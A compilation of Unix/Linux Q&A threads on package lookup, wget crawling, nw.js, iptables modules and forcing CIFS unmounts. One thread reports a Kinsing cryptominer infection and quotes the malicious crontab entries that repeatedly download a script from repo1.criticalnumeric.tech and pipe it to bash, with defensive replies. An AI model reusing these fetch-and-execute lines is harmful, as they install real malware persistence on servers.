OpenBSD pkg_info not finding package? - openbsd

I can see that the UniFi port is present this ports list. However, running pkg_info -Q unifi yields no results.
How do I determine why this is occurring?
I tested with pkg_info -Q unzip and it responds fine:
system# whoami
root
system# pkg_info -Q unifi
system# pkg_info -Q unzip
unzip-6.0p14
unzip-6.0p14-iconv
system#

Just learned that some ports (like UniFi) are not distributed with the base system. In order to add these types of packages, the ports tree needs to be configured.

Related

Does somebody knows about this: repo1.criticalnumeric.tech

I found that in the company server there is a crontab that runs with this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird, none of our engineers added this on the crontab, which makes me think that it could be an attack.
Any thoughts?
If your server is hosting a web application built using Laravel framework and if your debug mode is turned on, you are probably suffering from a recent RCE (Remote Code Execution) exploit.
Blogpost about technical details of the bug: https://www.ambionics.io/blog/laravel-debug-rce
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-3129
My professional recommendation: Never run your application with debug mode open on production.
The kinsing malware is the responsible for this attack, this takes control over the crontab to maintain infected the server, I had experience with this attack and for me the only way to clean the server is to backup all the important data and reinstall from cero, I followed all the recipes and nothing work to stop it, the most important with this attack is to change the permission on the cron tab file avoiding the malware to overwrite it.
Another important thing is to see the permissions of the .ssh on the infected user, because this prevents to login using the ssh keys, you must restore the permissions to the original state to grant access again.
Search for the kdevtmpfsi executable that is somewhere in the /var/tmp, delete it and create a dummy file with the same name with all the permissions to 000, this action is not the cure but serve to gain time to backup.
I think that it is related to the issue on the link below. I saw similar entries appear on the result of a ps aux command on one of our servers. If you are unlucky, you will find kdevtmpfsi is now hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner
We had same attack sat Feb 13, I changed the permisions to the crontab directory only rwx to root. Before we killed all the process of www-data with "killall -u www-data -9 " so far no other instance of the offending process... will keep monitoring. Also we disabled curl because we don't needed it.
I'm having same problem. Debian 10 server.
I checked with htop and found these:
curl -kL http://repo1.criticalnumeric.tech/scripts/cnc/install?time=1613422342
and
bash /tmp/.ssh-www-data/kswapd4
Both under www-data user. Those processes were using whole resources (CPU and memory).
Found something strange in www-data cron
root#***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
#reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
https://pastebin.com/Q049ZZtW
I think I have to reinstall Debian 10 on my server... Or how to clean it?

wget recursion and file extraction

I'm trying to use wget to elegantly & politely download all the pdfs from a website. The pdfs live in various sub-directories under the starting URL. It appears that the -A pdf option is conflicting with the -r option. But I'm not a wget expert! This command:
wget -nd -np -r site/path
faithfully traverses the entire site downloading everything downstream of path (not polite!). This command:
wget -nd -np -r -A pdf site/path
finishes immediately having downloaded nothing. Running that same command in debug mode:
wget -nd -np -r -A pdf -d site/path
reveals that the sub-directories are ignored with the debug message:
Deciding whether to enqueue "https://site/path/subdir1". https://site/path/subdir1 (subdir1) does not match acc/rej rules. Decided NOT to load it.
I think this means that the sub directories did not satisfy the "pdf" filter and were excluded. Is there a way to get wget to recurse into sub directories (of random depth) and only download pdfs (into a single local dir)? Or does wget need to download everything and then I need to manually filter for pdfs afterward?
UPDATE: thanks to everyone for their ideas. The solution was to use a two step approach including a modified version of this: http://mindspill.net/computing/linux-notes/generate-list-of-urls-using-wget/
UPDATE: thanks to everyone for their ideas. The solution was to use a two step approach including a modified version of this: http://mindspill.net/computing/linux-notes/generate-list-of-urls-using-wget/
Try this
1)the “-l” switch specifies to wget to go one level down from the primary URL specified. You could obviously switch that to how ever many levels down in the links you want to follow.
wget -r -l1 -A.pdf http://www.example.com/page-with-pdfs.htm
refer man wget for more details
if the above doesn't work,try this
verify that the TOS of the web site permit to crawl it. Then, one solution is :
mech-dump --links 'http://example.com' |
grep pdf$ |
sed 's/\s+/%20/g' |
xargs -I% wget http://example.com/%
The mech-dump command comes with Perl's module WWW::Mechanize (libwww-mechanize-perl package on debian & debian likes distros
for installing mech-dump
sudo apt-get update -y
sudo apt-get install -y libwww-mechanize-shell-perl
github repo https://github.com/libwww-perl/WWW-Mechanize
I haven't tested this, but you cans still give a try, what i think is you still need to find a way to get all URLs of a website and pipe to any of the solutions I have given.
You will need to have wget and lynx installed:
sudo apt-get install wget lynx
Prepare a script name it however you want for this example pdflinkextractor
#!/bin/bash
WEBSITE="$1"
echo "Getting link list..."
lynx -cache=0 -dump -listonly "$WEBSITE" | grep ".*\.pdf$" | awk '{print $2}' | tee pdflinks.txt
echo "Downloading..."
wget -P pdflinkextractor_files/ -i pdflinks.txt
to run the file
chmod 700 pdfextractor
$ ./pdflinkextractor http://www.pdfscripting.com/public/Free-Sample-PDF-Files-with-scripts.cfm

Unable to run nw.js application in ubuntu

Myself created a node webkit helloworld application based on the tutorial given in this link. Also I tried to run the same in ubuntu OS using the command given in this link. But when I run the command nw /home/myUsername/Documents/myNodeWebkitApps/helloWorld/myApp.nw it throws the following results in terminal.
usage
nw [udp] <options> <host> <port>
Default TCP protocol can be changed to UDP by ``udp'' argument.
UDP options
currently none
TCP options
-f firewall mode, connection is initiated by netread.
Host specification is ignored and can be omited.
-c ignored. Transmission checksum is activated by
default.
-C algorithm use the specified algorithm for checksum. This
option also implies -c.
Supported algorithms (the first is default):
md5 none
general options
-i <file> read data from file instead of stdin.
-b print speed in b/s instead of B/s
-h <n> print `#' after each n KiB transferred (def. 10485.76).
-H <n> print `#' after each n MiB transferred (def. 10.24).
-q be quiet.
-v be verbose.
-vv be very verbose.
-V show version.
-vV show verbose version.
return values
0 no errors.
1 some error occured.
2 checksum validation failed.
How can I run the same as given by first link?
The output here did not come from nw.js but netrw which is installed on your machine. You can fix it by removing netrw from your machine or correcting the path to nw.js.
Finally, I managed to run the hello world application with the help of this link and this stackoverflow answer like
install nw builder by command npm install nw-builder -g
If you got the error something like /usr/bin/env: node: No such file or directory then as given in second link above do a symlink of node as ln -s /usr/bin/nodejs /usr/bin/node
Now we can run our application by the command nwbuild -r ~/Desktop/webkit-example

List of loaded iptables modules

Is there any convenient way to show loaded iptables module list? I can show installed modules by listing /lib/iptables/ (or /lib64/iptables/) directory but I need active modules list.
Loaded iptables modules can be found in /proc/net/ip_tables_matches proc filesystem entry.
cat /proc/net/ip_tables_matches
In PHP I can access the loaded iptables modules by loading and exploding file contents:
$content = file_get_contents('/proc/net/ip_tables_matches');
$modules = explode("\n", $content);
Of course it requires proc filesystem to be mounted (Most GNU Linux distros mount it by default)
This is a really old post but here we go:
# lsmod | grep ip
shows a list of loaded modules, which I think most are related to iptables...
/proc/net/ip_tables_matches doesn't show modules (at least not in RHEL 6)
Take a look in the following directory (replace per your kernel version):
ls /lib/modules/2.6.32-504.8.1.el6.x86_64/kernel/net/netfilter/
You can load the module using (dropping the .ko as listed in the directory):
modprobe nf_conntrack_ftp
Alternatively, you can ensure it's loaded at boot by adding it to:
/etc/sysconfig/iptables-config (RHEL/CENTOS)
IPTABLES_MODULES="nf_conntrack_ftp"
This seems to be poorly documented.
Try this for a fast overview on the netfilter modules present on your system, here a one-liner for pasting:
for i in /lib/modules/$(uname -r)/kernel/net/netfilter/*; do echo -e "\e[33;1m$(basename "$i")\e[0m"; strings "$i" | \grep -e description -e depends| sed -e 's/Xtables: //g' -e 's/=/: /g' -e 's/depends=/depends on: /g'; echo; done
Again for readability, with added newlines:
#!/bin/bash
for i in /lib/modules/$(uname -r)/kernel/net/netfilter/*
do
echo -e "\e[33;1m$(basename "$i")\e[0m"
strings "$i" | \grep -e description -e depends | sed -e 's/Xtables: //g' -e 's/=/: /g' -e 's/depends=/depends on: /g'
echo
done
Filename will appear in yellow, from which you can guess if the module in question exists or not. Description and dependencies are the next two lines below.
This will not cover everything (because this would be too easy, ofc). Only looking up the modules manually, to see if they exist, gives you 100% accurate information.
iptables -m <match/module name> --help
If a module exists on your system, at the end of the help text you will get some info on how to use it:
ctr-014# iptables -m limit --help
iptables v1.4.14
Usage: iptables -[ACD] chain rule-specification [options]
iptables -I chain [rulenum] rule-specification [options]
...
[!] --version -V print package version.
limit match options:
--limit avg max average match rate: default 3/hour
[Packets per second unless followed by
/sec /minute /hour /day postfixes]
--limit-burst number number to match in a burst, default 5
ctr-014#
It the module is not present on your system:
ctr-014# iptables -m iplimit --help
iptables v1.4.14: Couldn't load match `iplimit':No such file or directory
Try `iptables -h' or 'iptables --help' for more information.
ctr-014#
As Gonio has suggested lsmod lists all loaded kernel modules, but grepping "ip" won't give you all iptables modules.
I would rather use
lsmod|grep -E "nf_|xt_|ip"
and still, I'm not sure the list will be complete.
As an alternative method, this can also be done with a Python script.
First make sure you have the iptc library.
sudo pip install --upgrade python-iptables
(Assuming Python3 is your version)
import iptc
table = iptc.Table(iptc.Table.FILTER)
for chain in table.chains:
print("------------------------------------------")
print("Chain ", chain.name)
for rule in chain.rules:
print("Rule ", "proto", rule.protocol, "src:", rule.src, "dst:" , rule.dst, "in:", rule.in_interface, "out:", rule.out_interface)
print("Matches:")
for match in rule.matches:
print(match.name)
print("Target:")
print(rule.target.name)
print("------------------------------------------")

How do you force a CIFS connection to unmount

I have a CIFS share mounted on a Linux machine. The CIFS server is down, or the internet connection is down, and anything that touches the CIFS mount now takes several minutes to timeout, and is unkillable while you wait. I can't even run ls in my home directory because there is a symlink pointing inside the CIFS mount and ls tries to follow it to decide what color it should be. If I try to umount it (even with -fl), the umount process hangs just like ls does. Not even sudo kill -9 can kill it. How can I force the kernel to unmount?
I use lazy unmount: umount -l (that's a lowercase L)
Lazy unmount. Detach the filesystem
from the filesystem hierarchy now, and
cleanup all references to the
filesystem as soon as it is not busy
anymore. (Requires kernel 2.4.11 or
later.)
umount -a -t cifs -l
worked like a charm for me on CentOS 6.3. It saved me a server reboot.
On RHEL 6 this worked:
umount -f -a -t cifs -l
This works for me (Ubuntu 13.10 Desktop to an Ubuntu 14.04 Server) :-
sudo umount -f /mnt/my_share
Mounted with
sudo mount -t cifs -o username=me,password=mine //192.168.0.111/serv_share /mnt/my_share
where serv_share is that set up and pointed to in the smb.conf file.
I had this issue for a day until I found the real resolution. Instead of trying to force unmount an smb share that is hung, mount the share with the "soft" option. If a process attempts to connect to the share that is not available it will stop trying after a certain amount of time.
soft Make the mount soft. Fail file system calls after a number of seconds.
mount -t smbfs -o soft //username#server/share /users/username/smb/share
stat /users/username/smb/share/file
stat: /users/username/smb/share/file: stat: Operation timed out
May not be a real answer to your question but it is a solution to the problem
There's a -f option to umount that you can try:
umount -f /mnt/fileshare
Are you specifying the '-t cifs' option to mount? Also make sure you're not specifying the 'hard' option to mount.
You may also want to consider fusesmb, since the filesystem will be running in userspace you can kill it just like any other process.
Try umount -f /mnt/share. Works OK with NFS, never tried with cifs.
Also, take a look at autofs, it will mount the share only when accessed, and will unmount it afterworlds.
There is a good tutorial at www.howtoforge.net
I had a very similar problem with davfs. In the man page of umount.davfs, I found that the -f -l -n -r -v options are ignored by umount.davfs. To force-unmount my davfs mount, I had to use umount -i -f -l /media/davmount.
umount -f -t cifs -l /mnt &
Be careful of &, let umount run in background.
umount will detach filesystem first, so you will find nothing abount /mnt. If you run df command, then it will umount /mnt forcibly.
Approaching this problem sideways:
If you can't unmount because the filesystem is busy, is your ssh/terminal session cd'd into the mount directory, therefore making the filesystem busy?
For me, the solution was to cd into my home, then sudo umount worked flawlessly.
cd ~
umount /path/to/my/share
I would post this as a comment, but I have insufficient reputation. Hoping to spare someone else the forehead slap.
I experienced very different results regarding unmounting a dead cifs mount and found several tricks to bypass the problem temporarily.
Let's start with the mountpoint command. It can be useful to analyze the status of a mount:
mountpoint /mnt/smb_share
Usually it returns is a mountpoint or / is not a mountpoint.
But it can even return:
No such device
Transport endpoint is not connected
<nothing / stale>
For every result expect of is not a mountpoint there is a chance of unmounting.
You could try the usual way:
umount /mnt/smb_share
or force mode:
umount /mnt/smb_share -f
But often the force does not help. It simply returns the same nasty device is busy message.
Then the only option is to use the lazy mode:
umount /mnt/smb_share -l
BUT: This does not unmount anything. It only "moves" the mount to the root of the system, which can be seen as follows:
# lsof | grep mount | grep cwd
mount.cif 3125 root cwd unknown / (stat: No such device)
mount.cif 3150 root cwd unknown / (stat: No such device)
It is even noted in the documentation:
Lazy unmount. Detach the filesystem from the file hierarchy
now, and clean up all references to this filesystem as soon
as it is not busy anymore.
Now if you are unlucky, it will stay there forever. Even killing the process probably does not help:
kill -9 $pid
But why is this a problem? Because mount /mnt/smb_share does not work until the lazy unmounted path is really cleaned up by the Linux Kernel. And this is even mentioned in the documentation of umount. "lazy" should only be used to avoid a long shutdown / reboot times:
A system reboot would be expected in near future if you’re
going to use this option for network filesystem or local
filesystem with submounts. The recommended use-case for
umount -l is to prevent hangs on shutdown due to an
unreachable network share where a normal umount will hang due
to a downed server or a network partition. Remounts of the
share will not be possible.
Workarounds
Use a different SMB version
If you still have hopes that the lazy unmounted path will ever be not busy anymore and cleaned up by the Linux Kernel or you can't reboot at the moment, then you are maybe lucky and your SMB server supports different protocol versions. By that we can use the following trick:
Lets say you mounted your share as follows:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw
By that Linux automatically tries the maximum support SMB protocol version. Maybe 3.1. Now, you can force this version and it won't mount as expected:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw,vers=3.1
But then simply try a different version:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw,vers=3.0
or maybe 2.1:
mount.cifs //smb.server/share /mnt/smb_share -o username=smb_user,password=smb_pw,vers=2.1
Change the IP of the SMB server
If you are able to change the IP address or add a second IP to your SMB server, you can use this to mount the same server.
Dirty: Forward the traffic
Lets say the SMB server has the IP address 10.0.0.1 and the mount is really dead. Then create this iptables rule:
iptables -t nat -A OUTPUT -d 10.0.0.250 -j DNAT --to-destination 10.0.0.1
Now change your mount rule accordingly, so it mounts the samba server through IP 10.0.0.250 instead of 10.0.0.1 and voila, its mounted without server reboot. Dirty, but it works. PS This rule does not survive a reboot, so you should mount the SMB server manually and leave the /etc/fstab as usual.
More debugging
If you want to check if samba connection itself is theoretically working, you could try to list all SMB shares of the server through SMB3 as follows:
smbclient //smb.server -U "smb_user" -m SMB3 -L
or to view the content of a share with SMB1:
smbclient //smb.server -U "smb_user" -m NT1 -c ls
On RHEL 6 this worked for me also:
umount -f -a -t cifs -l FOLDER_NAME
A lazy unmount will do the job for you.
umount -l <mount path>

Resources